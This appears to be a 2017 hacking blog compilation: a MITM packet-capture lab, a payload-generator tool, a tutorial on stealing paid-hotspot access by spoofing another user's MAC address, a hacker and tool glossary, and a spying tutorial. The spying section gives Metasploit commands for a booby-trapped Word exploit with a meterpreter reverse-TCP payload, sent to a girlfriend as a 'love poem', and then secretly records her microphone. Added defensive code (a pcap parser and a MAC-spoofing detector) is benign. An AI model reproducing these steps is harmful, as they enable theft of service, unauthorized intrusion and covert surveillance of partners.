Tuesday 21 November 2017

Create Your Own MITM Test Lab

Please consult the detailed guide on setting up your own Snifflab network here: https://openeffect.ca/snifflab-an-environment-for-testing-mobile-devices/
Researchers and end-users alike often seek to understand what data their mobile device is sending to third parties. Unfortunately, monitoring one’s phone to see what data is sent, and to whom, is not exactly simple. Using packet capture software on Android is impossible without first rooting the device, and even then it is difficult to use and to export the saved data. There are no applications to capture packets on iOS.

Our motivation for creating the test environment described herein is to make it incredibly easy to capture packets for any device with a WiFi connection, with very little client configuration needed.

How it works
In our environment, dubbed Snifflab, a researcher simply connects to the Snifflab WiFi network, is prompted to install a custom certificate authority on the device, and then can use their device as needed for the test.

Snifflab architecture
All traffic on the network is logged by a Raspberry Pi dedicated to that task (“PCAP Collecting Machine”, in the Figure). The traffic is cloned by a Great Scott Gadgets Throwing Star LAN Tap, which routes it both to its destination, and to our Raspberry Pi. The Pi continually collects packet data, creating new packet capture (pcap) files at a regular interval, or once the active file reaches a configurable size. Saved files are regularly transferred to another machine (“Backup Machine”) for persistent storage. Users with SSH access to the Pi can also manually restart the pcap service, to get instant access to the captured packets, instead of waiting for the interval.

The custom certificate that each client must install enables the proxy server (“MITM Proxy Machine”), through which Snifflab routes its traffic, to intercept HTTPS requests to the outside world and re-encrypt them using certificates generated on the fly. This allows the researcher to later decrypt most captured network traffic sent over HTTPS.
On the backup machine, the researcher has access to all previously collected PCAPs, organized into folders by date, with each file named by the Unix time at which the capture began.
The researcher may then open up the collected PCAP(s) in Wireshark or their utility of choice to analyze and decrypt the traffic.

On packet captures
A packet capture (pcap) is a widely used data format for storing low-level network data transmission information. The packet is the base unit of data transmission on networks. To send a message from one computer to another, networking software breaks the message up into small packets, each carrying metadata that, among other things, describes the source of the data, the destination, and the packet’s identifier so that packets can be reassembled correctly at the destination. A pcap file is a collection of packets sent over a network. pcaps are created using software that “listens” to one or more network interfaces on a given device and dumps every packet it sees into a pcap file for later analysis.

For example, one could listen on a computer’s WiFi interface, or the ethernet interface, or both.
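To make the pcap layout concrete, here is an added example (not part of the Snifflab guide or its code): a minimal parser for the classic libpcap file format, run over a constructed two-frame capture, which also rejects a file cut off mid-record, the shape a capture file can have if it is copied while the collector is still writing it.

```python
import struct
from typing import Dict, List, Tuple

# libpcap magic numbers; the byte order they appear in tells us the file's endianness
PCAP_MAGIC_USEC = 0xA1B2C3D4  # timestamps carry a microsecond fraction
PCAP_MAGIC_NSEC = 0xA1B23C4D  # timestamps carry a nanosecond fraction
LINKTYPE_ETHERNET = 1


def parse_pcap(data: bytes) -> Tuple[Dict, List[Dict]]:
    """Parse a classic pcap file: a 24-byte global header, then for each packet a
    16-byte record header followed by the bytes that were captured for it."""
    if len(data) < 24:
        raise ValueError("truncated global header")
    magic_le, = struct.unpack("<I", data[:4])
    magic_be, = struct.unpack(">I", data[:4])
    if magic_le in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC):
        endian, magic = "<", magic_le
    elif magic_be in (PCAP_MAGIC_USEC, PCAP_MAGIC_NSEC):
        endian, magic = ">", magic_be
    else:
        raise ValueError("not a pcap file (bad magic)")
    frac_div = 1_000_000 if magic == PCAP_MAGIC_USEC else 1_000_000_000
    vmaj, vmin, _zone, _sig, snaplen, linktype = struct.unpack(endian + "HHiIII", data[4:24])
    header = {"version": (vmaj, vmin), "snaplen": snaplen, "linktype": linktype}

    packets: List[Dict] = []
    off = 24
    while off < len(data):
        if off + 16 > len(data):
            raise ValueError("truncated record header at offset %d" % off)
        ts_sec, ts_frac, incl_len, orig_len = struct.unpack(endian + "IIII", data[off:off + 16])
        off += 16
        # incl_len is what was saved; orig_len is the size on the wire (larger if snaplen cut it)
        if incl_len > snaplen or incl_len > orig_len:
            raise ValueError("corrupt record header at offset %d" % (off - 16))
        if off + incl_len > len(data):
            raise ValueError("truncated packet data at offset %d" % off)
        packets.append({"ts": ts_sec + ts_frac / frac_div, "incl_len": incl_len,
                        "orig_len": orig_len, "data": data[off:off + incl_len]})
        off += incl_len
    return header, packets


def ethernet_summary(pkt: bytes) -> Tuple[str, str, int]:
    """Return (source MAC, destination MAC, EtherType) of a captured Ethernet frame."""
    if len(pkt) < 14:
        raise ValueError("frame shorter than an Ethernet header")

    def fmt(mac: bytes) -> str:
        return ":".join("%02x" % b for b in mac)

    etype, = struct.unpack("!H", pkt[12:14])
    return fmt(pkt[6:12]), fmt(pkt[:6]), etype


def build_sample_pcap(truncate: bool = False) -> bytes:
    """Constructed sample capture: two Ethernet frames (IPv4 and ARP EtherTypes) with
    zeroed payloads. truncate=True chops the file inside the last record."""
    mac_a = bytes.fromhex("020000000001")  # constructed, locally administered addresses
    mac_b = bytes.fromhex("020000000002")
    frames = [mac_b + mac_a + b"\x08\x00" + b"\x00" * 40,  # 54-byte IPv4-typed frame
              mac_b + mac_a + b"\x08\x06" + b"\x00" * 28]  # 42-byte ARP-typed frame
    out = struct.pack("<IHHiIII", PCAP_MAGIC_USEC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    ts = 1511222400  # constructed Unix time of the first packet
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", ts + i, 500_000 * i, len(frame), len(frame)) + frame
    return out[:-10] if truncate else out


if __name__ == "__main__":
    hdr, pkts = parse_pcap(build_sample_pcap())
    print(hdr, [ethernet_summary(p["data"]) for p in pkts])
```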
Enigma Multipartform Payload


PREREQUISITES
  • python 2.7 for enigma.py
  • python 3.x for enigma3.py
  • metasploit
  • msfvenom
TESTED ON
Kali Linux - ROLLING EDITION

CLONE

git clone https://github.com/UndeadSec/Enigma.git

RUNNING

cd Enigma
python enigma.py
or

python3 enigma3.py

Monday 20 November 2017

Hacking WIFI Password (Paid Hotspots)

Prerequisites:
Operating system: Kali Linux (highly recommended)

Alfa USB adapter
An Alfa WiFi card, because Kali Linux ships with all the drivers for this card, it supports monitor mode, and it has a connector for an external antenna, so it can pick up WiFi signals from a distance.
How does it work?
You all know that moment: the happy moment when you find a public hotspot, followed by the disappointment of a pop-up that asks for a login code.
Everyone’s #1 frustration, at least it is mine. Now you can either be a nice guy and buy one of those cards, or you can be stubborn and try to hack stuff.
We’re going for the second one.
The security on these hotspots is usually based on MAC addresses.
The router has already been set up to decide which computers can and cannot use the internet.
During the login process, access to the internet is granted with a code: your MAC address is saved in a sort of database.
It will stay there for a couple of hours, depending on how much you paid for. After those hours are over,
the MAC address is automatically removed from the router’s database, and your access to the internet is removed with it.
If you don’t have one of these cards, you won’t be able to use the internet either.
But you are nonetheless connected to the network (at least to the part of the network that connects you to the login page).
You might feel it coming already: you can pry/spy into the network! What we will do isn’t really difficult, and I will sum it up in three steps:
1. Look at which devices are connected to the network (which MAC addresses have internet).
2. Change your MAC address to a MAC address with access to the internet.
3. Reconnect to the access point, the hotspot.
Once you connect to the network again, the router will recognize you as a user that paid to
use the internet and it will grant you access.
Execution
It’s best if you have Linux to execute this. I myself use Kali Linux, but any distro should work.
Open your terminal, we will turn off our wlan interface. Type:
ifconfig wlan0 down
Now we will put our network interface in a monitor mode:
iwconfig wlan0 mode monitor
And now we will check if that actually happened:
iwconfig

Now we will look for all networks nearby you. These networks will then be shown with a BSSID MAC-address.
airodump-ng wlan0
[Screenshot: airodump-ng displaying all nearby networks with their BSSID addresses]


Wait a while until your ‘target network’ appears and then copy the BSSID that belongs to it.
Then press CTRL+C to stop airodump-ng. Otherwise it will endlessly continue to search for networks.
Now we will look for every device on the network.
The devices are the computers that are connected to the network and are shown in the form of a MAC address.
It can take a while before these computers are found. It’s important to wait a while to see which MAC address has a lot of traffic.
This is the one that we will use; copy the MAC address.
airodump-ng --bssid [MAC ADDRESS OF THE NETWORK HERE] wlan0

Then:

ifconfig wlan0 down

And then we can change our MAC address to the one you chose:
macchanger -m [MAC ADDRESS OF THE COMPUTER WHICH YOU CHOSE] wlan0
Now you will get a confirmation that your MAC address has changed.
If you did this successfully, we will put our interface back into ‘managed mode’:
iwconfig wlan0 mode managed

Then turn on our WiFi-adapter again:
ifconfig wlan0 up

Check to see if it’s on:
ifconfig

Now go to the network interface GUI. Connect to the hotspot again and you can enjoy your free internet.
Conclusion:
As you can see, you can get access to the internet in a few easy steps.
Getting around the security this way is much faster, and the chance of success much higher, than with the standard way of WEP/WPA2 hacking.
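From the hotspot operator's side, the weakness described above is that authorization is keyed on the MAC address alone. As an added example that is not part of the original post, the Python below scans constructed DHCP lease lines in a dnsmasq-like format (an assumed format, not any real portal's log) and flags a MAC whose leases look like two different devices sharing it: the reported hostname changes, or the assigned address flaps between two leases within a short window.

```python
import re
from collections import defaultdict
from typing import Dict, List

# Constructed sample lines in a dnsmasq-style DHCPACK format; the MACs, IPs and
# hostnames are invented. 02:11:22:33:44:55 is leased to "alice-phone", then to a
# second host calling itself "kali", then back to alice-phone within a minute.
SAMPLE_LOG = """\
Nov 20 10:01:02 portal dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.21 02:11:22:33:44:55 alice-phone
Nov 20 10:03:10 portal dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.22 02:66:77:88:99:aa bob-laptop
Nov 20 10:41:55 portal dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.23 02:11:22:33:44:55 kali
Nov 20 10:42:20 portal dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.21 02:11:22:33:44:55 alice-phone
Nov 20 11:05:00 portal dnsmasq-dhcp[812]: DHCPACK(wlan0) 10.0.0.22 02:66:77:88:99:aa bob-laptop
"""

ACK_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*DHCPACK\(\S+\) "
    r"(?P<ip>\d+\.\d+\.\d+\.\d+) (?P<mac>(?:[0-9a-f]{2}:){5}[0-9a-f]{2})"
    r"(?: (?P<host>\S+))?$",
    re.IGNORECASE,
)


def parse_acks(log: str) -> List[Dict]:
    """Extract (time, ip, mac, hostname) from DHCPACK lines. The timestamp is reduced
    to seconds since midnight; a single day of log is assumed for simplicity."""
    acks = []
    for line in log.splitlines():
        m = ACK_RE.search(line)
        if not m:
            continue
        hh, mm, ss = m.group("ts").split()[-1].split(":")
        acks.append({"t": int(hh) * 3600 + int(mm) * 60 + int(ss),
                     "ip": m.group("ip"), "mac": m.group("mac").lower(),
                     "host": m.group("host") or ""})
    return acks


def find_suspect_macs(acks: List[Dict], flap_window: int = 600) -> Dict[str, List[str]]:
    """Return {mac: [reasons]} for MACs whose lease history suggests that more than
    one device is using the address during the paid session."""
    by_mac: Dict[str, List[Dict]] = defaultdict(list)
    for ack in sorted(acks, key=lambda a: a["t"]):
        by_mac[ack["mac"]].append(ack)

    suspects: Dict[str, List[str]] = {}
    for mac, leases in by_mac.items():
        reasons = []
        hosts = {lease["host"] for lease in leases if lease["host"]}
        if len(hosts) > 1:
            reasons.append("hostname changed: " + ", ".join(sorted(hosts)))
        # A genuine single client keeps its lease; two devices fighting over one MAC
        # tend to bounce between addresses in quick succession.
        for prev, cur in zip(leases, leases[1:]):
            gap = cur["t"] - prev["t"]
            if cur["ip"] != prev["ip"] and gap <= flap_window:
                reasons.append("address flapped %s -> %s within %ds" % (prev["ip"], cur["ip"], gap))
                break
        if reasons:
            suspects[mac] = reasons
    return suspects


if __name__ == "__main__":
    for mac, why in find_suspect_macs(parse_acks(SAMPLE_LOG)).items():
        print(mac, why)
```

A hostname change on its own also happens legitimately (a dual-boot laptop, for instance), so treat the output as an indicator to correlate with the association log rather than as proof.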


Types of Hackers

Hackers can be classified into different categories such as white hat, black hat, and grey hat, based on their intent when hacking a system.

WHITE HAT HACKERS

White Hat hackers are also known as Ethical Hackers. They never intend to harm a system; rather, they try to find weaknesses in a computer or network system as part of penetration testing and vulnerability assessments.
Ethical hacking is not illegal and it is one of the most in-demand jobs in the IT industry. There are numerous companies that hire ethical hackers for penetration testing and vulnerability assessments.

BLACK HAT HACKERS

Black Hat hackers, also known as crackers, are those who hack in order to gain unauthorized access to a system and harm its operations or steal sensitive information.
Black Hat hacking is always illegal because of its bad intent, which includes stealing corporate data, violating privacy, damaging the system, blocking network communication, etc.

GREY HAT HACKERS

Grey hat hackers are a blend of both black hat and white hat hackers. They act without malicious intent, but for their own fun they exploit a security weakness in a computer system or network without the owner’s permission or knowledge.
Their intent is to bring the weakness to the attention of the owners and to get appreciation or a small bounty from them.

MISCELLANEOUS HACKERS

Apart from the above well-known classes of hackers, we have the following categories of hackers based on what they hack and how they do it −

Red Hat Hackers

Red hat hackers are again a blend of both black hat and white hat hackers. They are usually on the level of hacking government agencies, top-secret information hubs, and generally anything that falls under the category of sensitive information.

Blue Hat Hackers

A blue hat hacker is someone outside computer security consulting firms who is used to bug-test a system prior to its launch. They look for loopholes that can be exploited and try to close these gaps. Microsoft also uses the term BlueHat to represent a series of security briefing events.

Elite Hackers

This is a social status among hackers, which is used to describe the most skilled. Newly discovered exploits will circulate among these hackers.

Script Kiddie

A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding of the underlying concept, hence the term Kiddie.

Neophyte

A neophyte, "n00b", or "newbie" or "Green Hat Hacker" is someone who is new to hacking or phreaking and has almost no knowledge or experience of the workings of technology and hacking.

Hacktivist

A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks.

Hacking Tools

In this chapter, we will discuss in brief some of the well-known tools that are widely used to prevent hacking and unauthorized access to a computer or network system.
NMAP
Nmap stands for Network Mapper. It is an open source tool that is used widely for network discovery and security auditing. Nmap was originally designed to scan large networks, but it can work equally well for single hosts. Network administrators also find it useful for tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime.
Nmap uses raw IP packets to determine −
·        what hosts are available on the network,
·        what services those hosts are offering,
·        what operating systems they are running on,
·        what type of firewalls are in use, and other such characteristics.
Nmap runs on all major computer operating systems such as Windows, Mac OS X, and Linux.
METASPLOIT
Metasploit is one of the most powerful exploit tools. It’s a product of Rapid7 and most of its resources can be found at: www.metasploit.com. It comes in two versions − a commercial and a free edition. Metasploit can be used from the command prompt or with the Web UI.
With Metasploit, you can perform the following operations −
·        Conduct basic penetration tests on small networks
·        Run spot checks on the exploitability of vulnerabilities
·        Discover the network or import scan data
·        Browse exploit modules and run individual exploits on hosts
BURP SUITE
Burp Suite is a popular platform that is widely used for performing security testing of web applications. It has various tools that work in collaboration to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
Burp is easy to use and provides the administrators full control to combine advanced manual techniques with automation for efficient testing. Burp can be easily configured and it contains features to assist even the most experienced testers with their work.
ANGRY IP SCANNER
Angry IP scanner is a lightweight, cross-platform IP address and port scanner. It can scan IP addresses in any range. It can be freely copied and used anywhere. In order to increase the scanning speed, it uses a multithreaded approach, wherein a separate scanning thread is created for each scanned IP address.
Angry IP Scanner simply pings each IP address to check if it’s alive, and then it resolves its hostname, determines the MAC address, scans ports, etc. The amount of gathered data about each host can be saved to TXT, XML, CSV, or IP-Port list files. With the help of plugins, Angry IP Scanner can gather any information about scanned IPs.
CAIN & ABEL
Cain & Abel is a password recovery tool for Microsoft Operating Systems. It helps in easy recovery of various kinds of passwords by employing any of the following methods −
·        sniffing the network,
·        cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks,
·        recording VoIP conversations,
·        decoding scrambled passwords,
·        recovering wireless network keys,
·        revealing password boxes,
·        uncovering cached passwords and analyzing routing protocols.
Cain & Abel is a useful tool for security consultants, professional penetration testers and everyone else who plans to use it for ethical reasons.
ETTERCAP
Ettercap stands for Ethernet Capture. It is a network security tool for Man-in-the-Middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. Ettercap has inbuilt features for network and host analysis. It supports active and passive dissection of many protocols.
You can run Ettercap on all the popular operating systems such as Windows, Linux, and Mac OS X.
ETHERPEEK
EtherPeek is a wonderful tool that simplifies network analysis in a multiprotocol heterogeneous network environment. EtherPeek is a small tool (less than 2 MB) that can be easily installed in a matter of few minutes.
EtherPeek proactively sniffs traffic packets on a network. By default, EtherPeek supports protocols such as AppleTalk, IP, IP Address Resolution Protocol (ARP), NetWare, TCP, UDP, NetBEUI, and NBT packets.
SUPERSCAN
SuperScan is a powerful tool for network administrators to scan TCP ports and resolve hostnames. It has a user friendly interface that you can use to −
·        Perform ping scans and port scans using any IP range.
·        Scan any port range from a built-in list or any given range.
·        View responses from connected hosts.
·        Modify the port list and port descriptions using the built in editor.
·        Merge port lists to build new ones.
·        Connect to any discovered open port.
·        Assign a custom helper application to any port.
QUALYSGUARD
QualysGuard is an integrated suite of tools that can be utilized to simplify security operations and lower the cost of compliance. It delivers critical security intelligence on demand and automates the full spectrum of auditing, compliance and protection for IT systems and web applications.
QualysGuard includes a set of tools that can monitor, detect, and protect your global network.
WEBINSPECT
WebInspect is a web application security assessment tool that helps identify known and unknown vulnerabilities within the Web application layer.
It can also help check that a Web server is configured properly, and attempts common web attacks such as parameter injection, cross-site scripting, directory traversal, and more.
LC4
LC4 was formerly known as L0phtCrack. It is a password auditing and recovery application. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks.
LC4 recovers Windows user account passwords to streamline migration of users to another authentication system or to access accounts whose passwords are lost.
LANGUARD NETWORK SECURITY SCANNER
LANguard Network Scanner monitors a network by scanning connected machines and providing information about each node. You can obtain information about each individual operating system.
It can also detect registry issues and have a report set up in HTML format. For each computer, you can list the netbios name table, current logged-on user, and Mac address.
NETWORK STUMBLER
Network stumbler is a WiFi scanner and monitoring tool for Windows. It allows network professionals to detect WLANs. It is widely used by networking enthusiasts and hackers because it helps you find non-broadcasting wireless networks.
Network Stumbler can be used to verify whether a network is well configured, check its signal strength or coverage, and detect interference between one or more wireless networks. It can also be used to detect non-authorized connections.
TONELOC
ToneLoc stands for Tone Locator. It was a popular war dialling computer program written for MS-DOS in the early ’90s. War dialling is a technique of using a modem to automatically scan a list of telephone numbers, usually dialling every number in a local area code.
Malicious hackers use the resulting lists in breaching computer security - for guessing user accounts, or locating modems that might provide an entry-point into computer or other electronic systems.

It can be used by security personnel to detect unauthorized devices on a company’s telephone network. 

Monday 13 November 2017

How to Spy on Anyone: Hacking Computers

Now that nearly everyone and everyplace has a computer, you can use those remote computers for some good old "cloak and dagger" spying. No longer is spying something that only the CIA, NSA, KGB, and other intelligence agencies can do—you can learn to spy, too. 

In this brand new series, we will explore how we can use the ubiquity of the computer to peek in on just about anyone and anyplace. Unlike the spy movies of yesteryear where the spy had to place a listening device in the lamp or in a houseplant, as long as there is a computer in the room, it can be used as a "bug."
We will examine how to turn that commonplace computer into our own bug to listen in on conversations, use as a spy camera, track Internet searches, and more. James Bond and Q have nothing on us!
In this first part, I will show you how to convert any computer, anywhere, into a listening device. As nearly every room now has a computer in it, you can put a bug in nearly every room, unnoticed and undetected.

FIRE UP KALI

The first step, of course, is to fire up Kali Linux. To be able to use any computer as a bug, the first step will be to compromise the target computer.


COMPROMISE THE REMOTE COMPUTER HACK

Probably the best way to compromise your target's computer is to use a carefully crafted email that will get the target to click on a document or link. Inside that document or link, we will embed a rootkit/listener that will enable us to turn on the built-in microphone on their computer and save any conversations in the room where it is located.
Since we know the victim (it may be a girlfriend, neighbor, spouse, business associate, foreign diplomat, foreign spy, etc.), we can be very specific in crafting an email that would gain their acceptance. The key, of course, is to create a document that sounds compelling, or at least interesting, to get the victim to click on the Word document.
This becomes an exercise in social engineering at this point. If the victim is a girlfriend/boyfriend, you might try sending a love letter. If the victim is a business associate, it might be a Word or Excel document with a sales or other report. If it is a neighbor, it may be a link to a community webpage.
I hope you get the point. Be creative and imaginative and send something that the person will be compelled to open and view.

FIND AN EXPLOIT

Now, if we want to exploit a Windows 7 system (most Windows 7 exploits will work on Windows 8), we will need to find a Windows 7 exploit that utilizes vulnerabilities in Microsoft's Word application.


This past spring, Microsoft revealed that hackers had found a vulnerability in Microsoft Word and Office Web apps that could allow remote code execution (read, rootkit). Here is Microsoft's announcement on their Technet Security Bulletin below (more info on Technet can be found here).

As you can see, they have named it MS14-017. When we do a search in Metasploit for this vulnerability/exploit, we find:
exploit/windows/fileformat/ms14_017_rtf


Now that we have found the proper exploit, let's load it into Metasploit by typing:
msf > use exploit/windows/fileformat/ms14_017_rtf


Once we have it loaded, let's type "info" to find more about this exploit.


Now, "show options."


As you can see, the option we need to fill is the FILENAME. In addition, note that this exploit works only on Office 2010.

SET THE FILENAME

In this example, we will be spying on your girlfriend, so let's send her a love poem. Let's set the FILENAME to "lovepoem.rtf."


set FILENAME lovepoem.rtf

SET THE PAYLOAD

Next, we need to set the payload to place in her "lovepoem." In this case, let's send the meterpreter as it gives us almost unlimited power and control over the hacked system.
msf > set PAYLOAD windows/meterpreter/reverse_tcp




Next, set the LHOST. This is the IP of your system. This tells the payload who to call back when it is executed by the victim.
Finally, simply type "exploit." This will create a Word file called "lovepoem" that will place the meterpreter on her system that we can then connect to.


OPEN A MULTI-HANDLER FOR THE CONNECTION

For the next step, we need to open a multi-handler to receive the connection back to our system.


msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp


And finally, set the LHOST to your IP.

SEND THE LOVE POEM TO YOUR GIRLFRIEND

Now that we have created our malicious file, you need to send it to your girlfriend. You likely will want to send it via an email attachment with a note telling her that you wrote her a short poem to express your love for her. Knowing that it is from you, I'm sure she will click on it as she loves you dearly and trusts you completely.

COMPROMISE HER SYSTEM

When she opens it, we will have a meterpreter session on her computer like that below. Now comes the good part.

RECORD WITH THE MICROPHONE

What we will do next is enable the microphone on her computer and begin to record all of the sounds within earshot of it. Metasploit has a Ruby script that will enable the microphone on the target machine and begin to record all sounds and conversations nearby. If we go to our ultimate list of meterpreter scripts, we can find it among the many ready Ruby scripts built for the meterpreter.
From the meterpreter prompt, simply type:


meterpreter > run sound_recorder -l /root


This will start the microphone on her computer and store the recorded conversations and sounds in a file in the /root directory on your system. Of course, you can choose any directory to store these recordings. Just make certain you have adequate hard drive space, as these files can become very large. When you want to hear what was recorded, simply open the stored file on your system.